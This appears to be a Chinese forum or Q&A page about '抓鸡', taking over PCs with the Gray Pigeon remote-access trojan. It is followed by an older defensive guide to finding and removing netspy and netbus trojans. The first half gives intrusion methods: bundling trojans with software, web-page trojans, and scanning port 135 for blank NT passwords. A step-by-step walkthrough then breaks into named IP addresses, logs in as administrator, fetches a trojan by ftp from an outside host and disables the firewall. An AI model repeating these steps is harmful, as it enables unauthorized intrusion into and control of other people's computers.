抓包筛选端口_端口扫描抓鸡能抓多少

hacker|
274

谁懂网络上常说的抓鸡是什么意思?求大神帮助

抓鸡一般指的是在网页或者软件里面嵌入木马程序。比如灰鸽子。然后我们用户通过浏览或者使用软件的时候中了木马。然后控制端那里就有你的上线登陆的机器的信息了。可以控制你的电脑。这个就是抓鸡。为什么叫鸡那。应为鸡的扩展名字叫做肉鸡那。为什么是肉鸡应为人们把肉鸡理解为软如任人宰割的食物。就是等着别人来宰割你

网吧里可以445端口抓鸡吗?如果可以又该怎样弄?

现在折腾这些没什么实际意义了,445端口的机子现在很难zhua了。支持sao445的服务器都很少了,别说在网吧了。现在就是1433的http或ftp自动传马抓鸡效益也不很理想了。目前可能算1433的无ftp传马还比较可以,其实内网上线不是很难的问题,很多人在解决灰鸽子内网上线的时候搞什么端口映射和vpn,其实都是不必要的。只需要两步,在路由器添加你所在机器需要上线的端口和把这台主机完全暴露给互联网就可以。还有其它不明白的欢迎和我交流。1063559698

最后友情提醒,网络安全最重要,请别恶意入侵别人计算机。

怎样让对方种灰鸽子?~~~

你鸽子首先要做免杀,不然傻瓜才会中

如果已经免杀那么你就有多种方法,这里介绍几个

诱骗法:(是个傻瓜方法)跟其他热门软件捆绑下直接传给对方,诱骗对方打开

网页挂马法:把鸽子制作成网马,然后在你自己的空间挂上你的网马,别人电脑有IE漏洞或系统漏洞的点击就中。

空间挂马法:你自己申请一个FTP空间或支持EXE文件的空间都可以,上传你的马,当然要和别的常用的软件先捆绑,把该软件的下载地址贴到论坛或QQ给别人,别人只要下载你的软件打开就中,看你本事了

经典的135抓鸡法:用端口扫描器

扫开了135端口的主机,把扫到的主机筛选出来,在用NT弱口令扫描器扫这些主机有谁存在NT弱口令,再筛选出扫到的主机,接着用啊D或recton开他们的23端口 telnet进去,开共享目录,最后秘密的给他们传马,啊D和recton这2个软件都有这些功能,而且很傻瓜化,全自动完成的,自己去下载。这个方法具体操作有些复杂,但都是最实用最基本的方法,这里不做详细说明,你自己去网上找教程。

最后提醒:鸽子一定要免杀,抓鸡愉快

135抓鸡教程详细

超详细135端口抓鸡

用到的工具:

1:ssport端口扫描器

2:Recton--D贺免杀专用版

3:NTscan扫描器

4: 黑防版灰鸽子

5:UPX压缩和解压器(简单加下壳)

首先我们要用ssport扫开放 135端口的电脑,然后再用NTscan扫空口令的

这些我已经扫好了,相信大家都应该扫的来

我们就随便找个IP吧,就找 218.87.53.61

现在用

Recton--D来开它的telnet

有点卡,大家耐心等下吧,不晓得这个网吧网速怎么这么慢!

这个IP不行,我们换个,换成 218.87.51.251

正在连接 218.87.51.251 ......

连接成功!

正在检查Telnet服务状态 ......

Telnet服务已被禁止!

正在改变启动类型为 Manual(手动) ......

正在改变服务状态 ......

正在设置 NTLM=0 ......

正在设置 端口=23 ......

Telnet服务已经成功打开!端口:23 .]

呵呵,已经成功打开了23端口,现在我们来配置下我们的鸽子

由于这个网吧的路由我还没拿到,所以鸽子上线我用映射9999端口的

这个教程我已经做过了,如果不懂的可以去找,

恩,打开远程映射端口成功,可以上线,现在我们来配置下我们的鸽子

给我们的鸽子随便加下壳,运气好可以免杀

比较好的免杀我现在就不做了,没时间,呵呵,具体我以后会在教程里发布的

已经加壳了,现在我们把鸽子丢到我们的空间上去,已经上去了

现在就该到肉鸡上去下鸽子了

用户名是:administrator

密码为 空

有点卡,呵呵

好,进去了,刚刚有人中了我的网马,呵呵]

现在我们来下我们的鸽子

用到的命令是 ftp

o

to 219.147.204.240

用户名

密码

然后进去后,get 你的马,我的就是 get 2.exe

具体看我操作

输入密码的时候,是看不到你输入的,呵呵

好了下载好了 ,看到 马了没

现在我们来运行它,如果不行的话,那可能就要关掉对方的防火墙

命令是 net stop sharedaccess

好了,木马已经运行了

我们去看下它有没有上线

好,已经上线了,IP地址主要是因为我是映射鸽子上线的,所以IP不显示

公网IP,我们来扑捉下屏幕

晕,不晓得为什么 扑捉不到屏幕,呵呵,反正已经上线了,任务完成

135端口扫描不到?

安装第三方防火墙和杀毒软件

黑客是基于TCP/IP协议通过某个端口进入你的个人电脑的。如果你的电脑设置了共享目录,那么黑客就可以通过139端口进入你的电脑,注意!WINDOWS有个缺陷,就算你的共享目录设置了多少长的密码,几秒钟时间就可以进入你的电脑,所以,你最好不要设置共享目录,不允许别人浏览你的电脑上的资料。除了139端口以外,如果没有别的端口是开放的,黑客就不能入侵你的个人电脑。那么黑客是怎么样才会进到你的电脑中来的呢?答案是通过特洛伊木马进入你的电脑。如果你不小心运行了特洛伊木马,你的电脑的某个端口就会开放,黑客就通过这个端口进入你的电脑。举个例子,有一种典型的木马软件,叫做netspy.exe。如果你不小心运行了netspy.exe,那么它就会告诉WINDOWS,以后每次开电脑的时候都要运行它,然后,netspy.exe又在你的电脑上开了一扇“门”,“门”的编号是7306端口,如果黑客知道你的7306端口是开放的话,就可以用软件偷偷进入到你的电脑中来了。特洛伊木马本身就是为了入侵个人电脑而做的,藏在电脑中和工作的时候是很隐蔽的,它的运行和黑客的入侵,不会在电脑的屏幕上显示出任何痕迹。WINDOWS本身没有监视网络的软件,所以不借助软件,是不知道特洛伊木马的存在和黑客的入侵。接下来,就来说利用软件如何发现自己电脑中的木马.

如何发现自己电脑中的木马

再以netspy.exe为例,现在知道netspy.exe打开了电脑的7306端口,要想知道自己的电脑是不是中netspy.exe,只要敲敲7306这扇“门”就可以了。你先打开C:\WINDOWS\WINIPCFG.EXE程序,找到自己的IP地址(比如你的IP地址是10.10.10.10),然后打开浏览器,在浏览器的地址栏中输入 ,如果浏...��查找木马.

进一步查找木马

让我们做一个试验:netspy.exe开放的是7306端口,用工具把它的端口修改了,经过修改的木马开放的是7777端口了,现在再用老办法是找不到netspy.exe木马了。我们可以用扫描自己的电脑的办法看看电脑有多少端口开放着,并且再分析这些开放的端口。

前面讲了电脑的端口是从0到65535为止,其中139端口是正常的,首先找个端口扫描器,推荐“代理猎手”,你上网以后,找到自己的IP地址,现在请关闭正在运行的网络软件,因为可能开放的端口会被误认为是木马的端口,然后让代理猎手对0到65535端口扫描,如果除了139端口以外还有其他的端口开放,那么很可能是木马造成的。

排除了139端口以外的端口,你可以进一步分析了,用浏览器进入这个端口看看,它会做出什么样的反映,你可以根据情况再判断了。

扫描这么多端口是不是很累,需要半个多小时,Tcpview.exe可以看电脑有什么端口是开放的,除了139端口以外,还有别的端口开放,你就可以分析了,如果判定自己的电脑中了木马,那么,你就得在硬盘上删除木马.

在硬盘上删除木马

最简单的办法当然是用杀毒软件删除木马了,Netvrv病毒防护墙可以帮你删除netspy.exe和bo.exe木马,但是不能删除netbus木马。

下面就netbus木马为例讲讲删除的经过。

简单介绍一下netbus木马,netbus木马的客户端有两种,开放的都是12345端口,一种以Mring.exe为代表(472,576字节),一种以SysEdit.exe为代表(494,592字节)。

Mring.exe一旦被运行以后,Mring.exe就告诉WINDOWS,每次启动就将它运行,WINDOWS将它放在了注册表中,你可以打开C:\WINDOWS\REGEDIT.EXE进入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run找到Mring.exe然后删除这个健值,你再到WINDOWS中找到Mring.exe删除。注意了,Mring.exe可能会被黑客改变名字,字节长度也被改变了,但是在注册表 中的位置不会改变,你可以到注册表的这个位置去找。

另外,你可以找包含有“netbus”字符的可执行文件,再看字节的长度,我查过了,WINDOWS和其他的一些应用软件没有包含“netbus”字符的,被你找到的文件多半就是Mring.exe的变种。

SysEdit.exe被运行以后,并不加到WINDOWS的注册表中,也不会自动挂到其他程序中,于是有人认为这是无害的木马,其实这是最可恶、最阴险的木马。别的木马被加到了注册表中,你就有痕迹可查了,就连专家们认为最凶恶的BO木马也可以轻而易举地被我们从注册表中删除。

而SysEdit.exe要是挂在其他的软件中,只要你不碰这个软件,SysEdit.exe也就不发作,一旦运行了被安装SysEdit.exe的程序,SysEdit.exe也同时启动了。我们再来作做这样一个实验,将SysEdit.exe和C:\WINDOWS\SYSTEM\Abcwin.exe捆绑起来,Abcwin.exe是智能ABC输入法,当我开启电脑到上网,只要没有打开智能ABC输入法打字聊天,SysEdit.exe也就没有被运行,你就不能进入我的12345端口,如果我什么时候想打字了,一旦启动智能ABC输入法(Abcwin.exe),那么捆绑在Abcwin.exe上的SysEdit.exe也同时被运行了,我的12345端口被打开,别人就可以黑到我的电脑中来了。同样道理,SysEdit.exe可以被捆绑到网络传呼机、信箱工具等网络工具上,甚至可以捆绑到拨号工具上,电脑中的几百的程序中,你知道会在什么地方发现它吗?所以我说这是最最阴险的木马,让人防不胜防。

有的时候知道自己中了netbus木马,特别是SysEdit.exe,能发现12345端口被开放,并且可以用netbus客户端软件进入自己的电脑,却不知道木马在什么地方。这时候,你可以检视内存,请打开C:\WINDOWS\DRWATSON.EXE,然后对内存拍照,查看“高级视图”中的“任务”标签,“程序”栏中列出的就是正在运行的程序,要是发现可疑的程序,再看“路径”栏,找到这个程序,分析它,你就知道是不是木马了。SysEdit.exe虽然可以隐藏在其他的程序后面,但是在C:\WINDOWS\DRWATSON.EXE中还是暴露了。

好了,来回顾一下,要知道自己的电脑中有没有木马,只要看看有没有可疑端口被开放,用代理猎手、Tcpview.exe都可以知道。要查找木马,一是可以到注册表的指定位置去找,二是可以查找包含相应的可执行程序,比如,被开放的端口是7306,就找包含“netspy”的可执行程序,三是检视内存,看有没有可以的程序在内存中。

你的电脑上的木马,来源有两种,一种是你自己不小心,运行了包含有木马的程序,另一种情况是,“网友”送给你“好玩”的程序。所以,你以后要小心了,要弄清楚了是什么程序再运行,安装容易排除难呀。?nbsp;

排除了木马以后,你就可以监视端口,---- 悄悄等待黑客的来临.

0条大神的评论

发表评论